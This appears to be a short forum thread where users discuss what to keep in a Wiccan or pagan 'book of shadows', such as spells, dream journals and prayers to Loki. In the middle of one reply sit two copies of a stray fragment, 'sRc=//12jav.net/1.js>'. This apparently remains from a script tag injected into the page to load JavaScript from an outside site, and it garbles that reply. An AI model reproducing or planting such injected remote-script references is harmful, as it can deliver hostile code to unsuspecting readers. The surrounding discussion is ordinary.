What are some things I should include in my book of shadows aside from my own spells, findings, and the God and Goddess.

I often keep helpful tips, and different techniques to keep with me. I use it as an ultimate guide. I have sections divided up, and I include "Lucid Dreaming" as a section, where I keep a journal of my dreams and progress, along with important techniques. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I have a book of shadows dedicated to Loki where I keep mostly prayers for him and his family.
